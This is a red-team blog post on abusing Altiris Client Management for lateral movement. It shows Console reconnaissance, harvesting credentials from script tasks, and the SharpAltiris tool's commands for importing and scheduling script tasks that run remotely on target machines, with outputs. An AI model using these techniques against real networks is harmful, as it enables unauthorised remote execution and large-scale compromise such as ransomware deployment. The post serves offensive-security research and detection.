-
Adversary Simulation
Our best in class red team can deliver a holistic cyber attack simulation to provide a true evaluation of your organisation’s cyber resilience.
-
Application
SecurityLeverage the team behind the industry-leading Web Application and Mobile Hacker’s Handbook series.
-
Penetration
TestingMDSec’s penetration testing team is trusted by companies from the world’s leading technology firms to global financial institutions.
-
Response
Our certified team work with customers at all stages of the Incident Response lifecycle through our range of proactive and reactive services.
Altiris Methods for Lateral Movement
Introduction
During a recent engagement the team came up against an unfamiliar product, Altiris. Very little public research was available about Altiris, with a considerable lack of information regarding abusing legitimate functionality of this solution to perform malicious actions. This blog post provides an overview of Altiris, providing two methods by which it can be leveraged to laterally move across an environment.
Altiris Client Management suite is a combination of products that facilitate the management of an organisations’ endpoints. Similarly to Microsoft’s System Centre Configuration Manager (SCCM), Altiris can be used to perform a wide range of administrative functions against systems. From the attacker perspective the most notable functionality is the ability to identify correlations between users and computers, as well as to execute tasks against target computers.
Altiris is made up of a number of core components:
- Notification Server (NS)
- Site Server (SS)
- Backend MSSQL Database
- Agent running on client endpoints (AexNSAgent.exe)
For the purpose of this blog post we will be focusing on the Notification Server, which provides access to the Altiris Web Interface (referred to as the Console).
Accessing the Web Interface
The main method by which system administrators interact with Altiris is via the Console. This is accessible on the Notification Server at “/Altiris/Console”:
By default authentication to this portal is via NTLM:
$ curl -v https://172.16.54.135/Altiris/Console -k
* Trying 172.16.54.135:443...
* TCP_NODELAY set
* Connected to 172.16.54.135 (172.16.54.135) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
* subject: CN=WIN-BV43VA0DTI3
* start date: Jul 5 12:55:06 2022 GMT
* expire date: Jul 5 12:55:06 2042 GMT
* issuer: CN=WIN-BV43VA0DTI3
* SSL certificate verify result: self signed certificate (18), continuing anyway.
> GET /Altiris/Console HTTP/1.1
> Host: 172.16.54.135
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Content-Type: text/html
< Server: Microsoft-IIS/8.5
< X-SMP-NSVersion: 8.6.3268.0
< WWW-Authenticate: Negotiate
< WWW-Authenticate: NTLM
< X-UA-Compatible: IE=EmulateIE10
< X-Frame-Options: SAMEORIGIN
< Date: Tue, 05 Jul 2022 13:44:47 GMT
< Content-Length: 1293
This is important for two reasons. Firstly, if you are able to dump LSASS on the Notification Server or a system from which sysadmins access the web interface there is no requirement to crack NTLM hashes. Secondly, as will be demonstrated below, executing under the context of a sysadmin (such as via token impersonation) will grant access to the Console.
An important operational point with regards to the Altiris Console pertains to access over a SOCKs proxy. This application is incredibly “request heavy”. This is to say that almost any interaction with the application results in large volumes of requests. MDSec was able to successfully interact with and abuse Altiris over a SOCKs proxy deployed via a HTTP beacon, however this required a high degree of patience.
Recon
Altiris provides a range of features within the Console that enable recon activities against the environment. For example, under Manage -> Computers it is possible to search a username and be provided with any systems that user has an active session on:
Moreover, when viewing each computer a list of tasks executed against that system can be viewed:
Under Manage -> Jobs and Tasks it is possible to view the various software packages and script tasks that have been created:
Script tasks can be viewed by simply clicking on them. As should be expected, it is highly likely that scripts will contain passwords:
It’s also possible to view which systems a task has been executed on. This may be of value if scripts contain local administrator credentials:
In general, similar to SCCM Altiris provides most of the functionality an adversary would need to identify high value systems and target them for lateral movement.
Executing Tasks
Creating and executing tasks is a relatively trivial process when performed from the Console. The steps are as follows:
- First navigate to Manage -> Jobs and Tasks, right click on an existing folder and select New -> Task:
- Next select Run Script:
- Select the script type (in this instance Powershell) and script contents:
- As an optional step, under Advanced are a number of configuration options such as user to run as the script as, whether the window should be hidden and if output should be returned:
- Once the script has been created click the new schedule button under the script contents and configure which systems this script should run on:
After having followed these steps it is possible to view when the script has successfully executed and what output was received.
Leveraging the API – SharpAltiris
In a number of instances it may not be operationally viable to access the Console. For example against organisations with strong beaconing detections deploying a SOCKs proxy may result in identification of your C2. Moreover, in many cases dumping LSASS to gain NTLM hashes for Altiris users may also result in detection.
Luckily Altiris provides an API from which various features can be accessed. As such we can leverage a .NET assembly that invokes these APIs in conjunction with token theft to perform the same tasks as previously described.
Process
Before explaining the process it’s worth discussing some of the core concepts of Altiris. First and foremost everything is referenced by GUIDs. Users, computers, tasks, folders, all of these have a unique GUID from which they can be referenced. Moreover, Tasks, Computers and Users are both considered Items and Resources. Finally, every resource and item within Altiris is configured with a parent folder (which itself has a unique GUID), as such the values provided in the preceding sections are unique to MDSec’s Altiris instance. This information will be relevant when we perform various stages of the attack. Overall the tool presented here can be used to:
- Identify which users correlate to various systems
- Enumerate tasks and their contents
- Create new tasks
- Schedule tasks against systems and view the output.
Recon
The first phase of this attack is to identify which user’s are associated with which systems. This is similar to SCCM, whereby you can leverage legitimate functionality to retrieve such information. For the next phases we will need the GUID of the computer.
For this and the majority of latter tasks SharpAltiris contains distinct modules. For example the FindUserComputer method shown below. The majority of modules are near identical.
public static void FindUserComputer(string notificationServer, string targetUser, string username = null, string password = null)
{
string webserviceUrl = "/altiris/ASDK.NS/ResourceManagementService.asmx/GetResourceByContext?parameters=type:computer, %" + targetUser + "%";
string finalUrl = notificationServer + webserviceUrl;
string requestOutput = HttpRequest(finalUrl, null, true, null, null, username, password);
Console.WriteLine(requestOutput);
}
Note the “parameters” GET parameter, we are searching for any computer where the username matches %targetuser%. An example of executing this request searching for “tim” is shown below:
>>> SharpAltiris.exe FindUserComputer https://altiris-ns:443 tim
<?xml version="1.0" encoding="utf-8"?>
<ArrayOfGuid xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://Altiris.ASDK.NS.com">
<guid>e27ee400-a6e2-4d2a-8456-23edff6dd00d</guid>
<guid>db85030b-cc3b-4f3f-a0d7-44206fc76b77</guid>
</ArrayOfGuid>
If we aren’t concerned with targeting users we can also leverage the GetItemsByName operation to retrieve the GUID of specific computers:
>>> SharpAltiris.exe GetItemsByName https://altiris-ns:443 Win10
Name: WIN10
<Guid>e27ee400-a6e2-4d2a-8456-23edff6dd00d</Guid>
Before we can schedule tasks against this system we must first create a script task item. However, we require certain instance specific information before we can craft a valid task. The easiest way to achieve creation of a valid script task is to simply export a legitimate script task and then import it with various values altered.
First we need to enumerate all of the script tasks:
>>> SharpAltiris.exe GetScriptTasks https://altiris-ns:443
<?xml version="1.0" encoding="utf-8"?>
<ArrayOfItemDetails xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://Altiris.ASDK.NS.com">
<ItemDetails>
<Name>Perl Script Sample</Name>
<Guid>5e4d7363-a9fa-486f-a9ac-06a0b96c5a4a</Guid>
<TypeName>ScriptTask</TypeName>
<LongTypeName>Altiris.TaskServerTasks.ScriptTask.ScriptTask</LongTypeName>
<TypeGuid>4f1b9b32-b5c6-4d83-8992-f73582217aac</TypeGuid>
<ParentFolderName>Notification Server</ParentFolderName>
<ParentFolderGuid>7a66ba52-f272-4cea-97a3-4510812b1f36</ParentFolderGuid>
<Attributes>Readonly, System</Attributes>
<Enabled>false</Enabled>
<IsSchedulableItem>false</IsSchedulableItem>
<ScheduleEnabled>false</ScheduleEnabled>
<SharedScheduleGuid>00000000-0000-0000-0000-000000000000</SharedScheduleGuid>
</ItemDetails>
<ItemDetails>
<Name>PowerShell Script Sample</Name>
<Guid>23fa22b2-6203-4c30-bca1-b980aa325357</Guid>
<TypeName>ScriptTask</TypeName>
<LongTypeName>Altiris.TaskServerTasks.ScriptTask.ScriptTask</LongTypeName>
<TypeGuid>4f1b9b32-b5c6-4d83-8992-f73582217aac</TypeGuid>
<ParentFolderName>Notification Server</ParentFolderName>
<ParentFolderGuid>7a66ba52-f272-4cea-97a3-4510812b1f36</ParentFolderGuid>
<Attributes>Readonly, System</Attributes>
<Enabled>false</Enabled>
<IsSchedulableItem>false</IsSchedulableItem>
<ScheduleEnabled>false</ScheduleEnabled>
<SharedScheduleGuid>00000000-0000-0000-0000-000000000000</SharedScheduleGuid>
</ItemDetails>
<ItemDetails>
<…Snipped…>
In this example we will be leveraging the Powershell Script Sample shown above. To retrieve the script’s contents we invoke the GetScriptTaskXml method of SharpAltiris.
>>> SharpAltiris.exe GetScriptTaskXml https://altiris-ns:443 23fa22b2-6203-4c30-bca1-b980aa325357
<?xml version="1.0" encoding="utf-8"?>
<string xmlns="http://Altiris.ASDK.NS.com">
<item guid="{23fa22b2-6203-4c30-bca1-b980aa325357}" classGuid="{4f1b9b32-b5c6-4d83-8992-f73582217aac}">
<!-- Type: Altiris.TaskServerTasks.ScriptTask.ScriptTask -->
<!-- Assembly: Altiris.TaskServerTasks, Version=8.6.3113.0, Culture=neutral, PublicKeyToken=99b1e4cc0d03f223 -->
<name>PowerShell Script Sample</name>
<alias />
<ownerNSGuid>{fd4b887f-7a2c-4217-8c5a-558bb88d3390}</ownerNSGuid>
<productGuid>{d1341aa4-95d3-4335-ad2f-a7f3389783b6}</productGuid>
<itemAttributes>Readonly, System</itemAttributes>
<itemLocalizations>
<culture name="">
<description><![CDATA[Sample PowerShell Script]]></description>
<name><![CDATA[PowerShell Script Sample]]></name>
</culture>
</itemLocalizations>
<versions count="1">
<version guid="9821b68f-f814-4250-b05c-f31907b75c2d" number="1">
<modifiedBy>WIN-BV43VA0DTI3\Administrator</modifiedBy>
<modifiedDate>637926247559370000</modifiedDate>
<name />
<description />
<state><vItem><baseClientTask /><remoteExecAdvanced><priority value="Normal" compatibility="Exclusive" /><preventComputerFromSleeping value="False" /><kill enforce="False" maxMinutes="-1" /><interruptable value="DEFAULT" /><platform configuredProviderGuid="00000000-0000-0000-0000-000000000000" /><hideTask value="False" /></remoteExecAdvanced><scriptText typeGuid="c788e602-79a7-43b3-9ef7-a9ca2e72209c"><![CDATA[
#Sample PowerShell Script
Write-Host "Hello world"
]]></scriptText><scriptAdvanced processSensitiveData="True" collectOutput="True" killChildProcesses="False" useReturnCodeToSucceed="False" returnCodeToSucceed="0" anyReturnCodeToSucceed="False" runAs="Default" username="" window="ShowNormal" /></vItem></state>
</version>
</versions>
<scriptTask containsInvalidCredentials="False" />
<baseClientTask />
<remoteExecAdvanced>
<priority value="Normal" compatibility="Exclusive" />
<preventComputerFromSleeping value="False" />
<kill enforce="False" maxMinutes="-1" />
<interruptable value="DEFAULT" />
<platform configuredProviderGuid="00000000-0000-0000-0000-000000000000" />
<hideTask value="False" />
</remoteExecAdvanced>
<scriptText typeGuid="c788e602-79a7-43b3-9ef7-a9ca2e72209c"><![CDATA[
#Sample PowerShell Script
Write-Host "Hello world"
]]></scriptText>
<scriptAdvanced processSensitiveData="True" collectOutput="True" killChildProcesses="False" useReturnCodeToSucceed="False" returnCodeToSucceed="0" anyReturnCodeToSucceed="False" runAs="Default" username="" window="ShowNormal" />
<parentFolderGuid>7a66ba52-f272-4cea-97a3-4510812b1f36</parentFolderGuid>
<originNS guid="{fd4b887f-7a2c-4217-8c5a-558bb88d3390}" name="WIN-BV43VA0DTI3" url="http://WIN-BV43VA0DTI3/Altiris/NS/" />
<sourceNS guid="{fd4b887f-7a2c-4217-8c5a-558bb88d3390}" name="WIN-BV43VA0DTI3" url="http://WIN-BV43VA0DTI3/Altiris/NS/" />
<security owner="{0FFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" inherit="True">
<aces>
<ace type="role" guid="2e1f478a-4986-4223-9d1e-b5920a63ab41" sid="{2E1F478A-4986-4223-9D1E-B5920A63AB41}" name="Symantec Administrators">
<permissionGrants>
<permissionGrant guid="{4ddc04c3-f0a5-4e88-84aa-c44c8c5ebcc4}" name="Read Permissions" />
<permissionGrant guid="{726b1c09-7108-450d-ae24-5f8e93135ed6}" name="Clone" />
<permissionGrant guid="{819dae1e-b1a5-4643-81a1-26ef95feb8a8}" name="Change Permissions" />
<permissionGrant guid="{983a2d22-7a82-4db0-a707-52c7d6b1441e}" name="Read" />
<permissionGrant guid="{ac296df1-eb40-4592-899f-25d5c07d45f6}" name="Write" />
<permissionGrant guid="{eca6254f-5017-4730-9b3f-5add230829b7}" name="Delete" />
<permissionGrant guid="{fbce1052-3bcf-4734-9701-d5bdb08fe64c}" name="Run" />
</permissionGrants>
</ace>
</aces>
</security>
<itemReferences>
<itemReference guid="{c6c14a32-2dd0-458c-9300-ab24e8d016fd}" hint="tasktotype" type="RelatedChild" />
</itemReferences>
</item></string>
Task Execution
At this stage we have all of the information we need to craft and schedule a malicious task. Taking the XML retrieved in the previous step there are a number of alterations that need to be made. First we require only what is included in the <item> tags. We must then modify the “item GUID” script text and version GUIDs. It’s also worth noting that when executing via the majority of C2 frameworks much of the quotes and any backlashes will need to be escaped. An example XML with highlighted changes is provided below.
<item guid="{23ff2232-6103-4a30-bca1-b980aa32535f}" classGuid="{4f1b9b32-b5c6-4d83-8992-f73582217aac}">
<!-- Type: Altiris.TaskServerTasks.ScriptTask.ScriptTask -->
<!-- Assembly: Altiris.TaskServerTasks, Version=8.6.3113.0, Culture=neutral, PublicKeyToken=99b1e4cc0d03f223 -->
<name>PowerShell Script Sample</name>
<alias />
<ownerNSGuid>{fd4b887f-7a2c-4217-8c5a-558bb88d3390}</ownerNSGuid>
<productGuid>{d1341aa4-95d3-4335-ad2f-a7f3389783b6}</productGuid>
<itemAttributes>Readonly, System</itemAttributes>
<itemLocalizations>
<culture name="">
<description><![CDATA[Not Malware]]></description>
<name><![CDATA[Not Malware]]></name>
</culture>
</itemLocalizations>
<versions count="1">
<version guid="9821f68f-f814-4250-b05c-f31907b71c3e" number="1">
<modifiedBy>WIN-BV43VA0DTI3\Administrator</modifiedBy>
<modifiedDate>637926247559370000</modifiedDate>
<name />
<description />
<state><vItem><baseClientTask /><remoteExecAdvanced><priority value="Normal" compatibility="Exclusive" /><preventComputerFromSleeping value="False" /><kill enforce="False" maxMinutes="-1" /><interruptable value="DEFAULT" /><platform configuredProviderGuid="00000000-0000-0000-0000-000000000000" /><hideTask value="False" /></remoteExecAdvanced><scriptText typeGuid="c788e602-79a7-43b3-9ef7-a9ca2e72209c"><![CDATA[
dir c:\
]]></scriptText><scriptAdvanced processSensitiveData="True" collectOutput="True" killChildProcesses="False" useReturnCodeToSucceed="False" returnCodeToSucceed="0" anyReturnCodeToSucceed="False" runAs="Default" username="" window="ShowNormal" /></vItem></state>
</version>
</versions>
<scriptTask containsInvalidCredentials="False" />
<baseClientTask />
<remoteExecAdvanced>
<priority value="Normal" compatibility="Exclusive" />
<preventComputerFromSleeping value="False" />
<kill enforce="False" maxMinutes="-1" />
<interruptable value="DEFAULT" />
<platform configuredProviderGuid="00000000-0000-0000-0000-000000000000" />
<hideTask value="False" />
</remoteExecAdvanced>
<scriptText typeGuid="c788e602-79a7-43b3-9ef7-a9ca2e72209c"><![CDATA[
dir c:\
]]></scriptText>
<scriptAdvanced processSensitiveData="True" collectOutput="True" killChildProcesses="False" useReturnCodeToSucceed="False" returnCodeToSucceed="0" anyReturnCodeToSucceed="False" runAs="Default" username="" window="ShowNormal" />
<parentFolderGuid>7a66ba52-f272-4cea-97a3-4510812b1f36</parentFolderGuid>
<originNS guid="{fd4b887f-7a2c-4217-8c5a-558bb88d3390}" name="WIN-BV43VA0DTI3" url="http://WIN-BV43VA0DTI3/Altiris/NS/" />
<sourceNS guid="{fd4b887f-7a2c-4217-8c5a-558bb88d3390}" name="WIN-BV43VA0DTI3" url="http://WIN-BV43VA0DTI3/Altiris/NS/" />
<security owner="{0FFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" inherit="True">
<aces>
<ace type="role" guid="2e1f478a-4986-4223-9d1e-b5920a63ab41" sid="{2E1F478A-4986-4223-9D1E-B5920A63AB41}" name="Symantec Administrators">
<permissionGrants>
<permissionGrant guid="{4ddc04c3-f0a5-4e88-84aa-c44c8c5ebcc4}" name="Read Permissions" />
<permissionGrant guid="{726b1c09-7108-450d-ae24-5f8e93135ed6}" name="Clone" />
<permissionGrant guid="{819dae1e-b1a5-4643-81a1-26ef95feb8a8}" name="Change Permissions" />
<permissionGrant guid="{983a2d22-7a82-4db0-a707-52c7d6b1441e}" name="Read" />
<permissionGrant guid="{ac296df1-eb40-4592-899f-25d5c07d45f6}" name="Write" />
<permissionGrant guid="{eca6254f-5017-4730-9b3f-5add230829b7}" name="Delete" />
<permissionGrant guid="{fbce1052-3bcf-4734-9701-d5bdb08fe64c}" name="Run" />
</permissionGrants>
</ace>
</aces>
</security>
<itemReferences>
<itemReference guid="{c6c14a32-2dd0-458c-9300-ab24f8d136fe}" hint="tasktotype" type="RelatedChild" />
</itemReferences>
</item>
Note that simply copying and pasting the XML provided above against a different instance of Altiris will not work. You must alter an existing task present within the target organisations, specifically the following components:
- item guid (<item guid=”{23ff2232-6103-4a30-bca1-b980aa32535f}”)
- Name
- Version guid (<version guid=”9821f68f-f814-4250-b05c-f31907b71c3e” number=”1″>)
- Item reference guid (<itemReference guid=”{c6c14a32-2dd0-458c-9300-ab24f8d136fe}”)
We can then execute the ImportScriptXmlString function of SharpAltiris.
>>> SharpAltiris.exe ImportScriptXmlString https://altiris-ns:443 SharpAltiris.exe ImportScriptXmlString https://172.16.54.135:443 "<item guid=\"{23ff2232-6203-aa30-bfa1-b980aa32535f}\" classGuid=\"{<…Snipped…>
[+] Task imported successfully
After executing this function the task should be visible in the Console:
The next step involves scheduling the task we have just created against target systems. For this we need the Task GUID (which we have from the XML above) as well as the Computer GUID retrieved from the recon phase. We can then execute the ScheduleTask function to force execution of the script the next time the target system’s Altiris agent checks in. A successful execution of this request should provide the executing task GUID, this information will be useful in the next step. Note that this function supports a CSV list of computer GUIDs.
>>> SharpAltiris.exe ScheduleTask https://altiris-ns:443 23ff2232-6103-4a30-bca1-b980aa32535f db85030b-cc3b-4f3f-a0d7-44206fc76b77
<?xml version="1.0" encoding="utf-8"?>
<guid xmlns="http://Altiris.ASDK.Task.com">5e218d15-9e20-473e-91ef-83c7ca561680</guid>
[+] Task Executed successfully
We can also see the task scheduled against the computer in the Console:
As shown in this image the task has executed successfully. In order to identify the task status we can also leverage the GetTaskStatus passing the previously retrieved GUID:
>>> SharpAltiris.exe GetTaskStatus https://altiris-ns:443 5e218d15-9e20-473e-91ef-83c7ca561680
<?xml version="1.0" encoding="utf-8"?>
<ArrayOfTaskStatusDetails xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://Altiris.ASDK.Task.com">
<TaskStatusDetails>
<EndTime>2022-07-06T14:14:39.137</EndTime>
<Failed>0</Failed>
<InstanceGuid>5e218d15-9e20-473e-91ef-83c7ca561680</InstanceGuid>
<NotStarted>0</NotStarted>
<ResourceGuids>
<guid>db85030b-cc3b-4f3f-a0d7-44206fc76b77</guid>
</ResourceGuids>
<ReturnCode>0</ReturnCode>
<RunName>Not Malware</RunName>
<StartTime>2022-07-06T14:14:34.477</StartTime>
<Started>0</Started>
<StartedBy>WIN-BV43VA0DTI3\Administrator</StartedBy>
<Status>Completed</Status>
<SubTaskGuids>
<guid>b5c2a118-7840-4834-9da5-5dd7b2d7c46b</guid>
</SubTaskGuids>
<Succeeded>1</Succeeded>
<Summary>1 resources - 100% succeeded</Summary>
<TotalComputers>1</TotalComputers>
<TotalFinished>1</TotalFinished>
<Type>Client Task</Type>
</TaskStatusDetails>
</ArrayOfTaskStatusDetails>
Once the task is completed we can retrieve any output through the GetTaskOutput function, which requires the previously retrieved executing task GUID and computer GUID:
>>> SharpAltiris.exe GetTaskOutput https://altiris-ns:443 5e218d15-9e20-473e-91ef-83c7ca561680 db85030b-cc3b-4f3f-a0d7-44206fc76b77
<?xml version="1.0" encoding="utf-8"?>
<TaskResourceStatusDetails xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://Altiris.ASDK.Task.com">
<OutputProperties>
<TaskPropertyDetails>
<Description />
<DisplayName>ScriptOutput</DisplayName>
<InternalName />
<Required>false</Required>
<Type />
<Value><string>
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 05/07/2022 13:26 inetpub
d---- 22/08/2013 16:52 PerfLogs
d-r-- 05/07/2022 13:49 Program Files
d---- 05/07/2022 14:25 Program Files (x86)
d---- 05/07/2022 13:47 SQLServer2016Media
d-r-- 05/07/2022 13:50 Users
d---- 05/07/2022 13:26 Windows
-a--- 05/07/2022 14:51 258532 TSHmsi.log
</string></Value>
</TaskPropertyDetails>
</OutputProperties>
<ResourceGuid>db85030b-cc3b-4f3f-a0d7-44206fc76b77</ResourceGuid>
<ResourceName>WIN-BV43VA0DTI3</ResourceName>
<ReturnCode>0</ReturnCode>
<Status>1</Status>
<TaskInstanceGuid>5e218d15-9e20-473e-91ef-83c7ca561680</TaskInstanceGuid>
<TaskInstanceName>ExecutingNotMalware</TaskInstanceName>
</TaskResourceStatusDetails>
These steps can of course be performed over your favourite C2:
Conclusion
Altiris, like many similar solutions are often considered high value targets for adversaries. For low to medium skilled threat actors they provide a trivial means by which ransomware can be deployed at scale. Advanced adversaries are more likely to target such environments in order to compromise the key systems of an organisation.
Moreover, monitoring of malicious tasks, packages and collections within solutions such as SCCM and Altiris are often severely lacking. It is often not scalable to continually monitor the creation of such artefacts within enterprise environments and subsequently identify the malicious package amongst the thousands of legitimate ones.
From an endpoints detection perspective it is likely that exceptions are configured such that actions performed by the solution’s agent are simply ignored. As an example, an organisation that leverages Altiris and heavily relies on Powershell Script Tasks is likely to have a rule ignoring the Altiris Agent (AexNSAgent.exe) creating Powershell processes. Such a parent process relationship is shown in the figure below whereby a task to open a Powershell prompt was executed.
The tool presented in this post is designed to be as bare bones as possible. Implementing only the features required to laterally move. Moreover, it has been designed specifically such that each step must be performed manually. This is simply to mitigate against the risk of accidental execution.
SharpAltiris can be found on the MDSec ActiveBreach github.
This blog post was written by Tim Carrington.
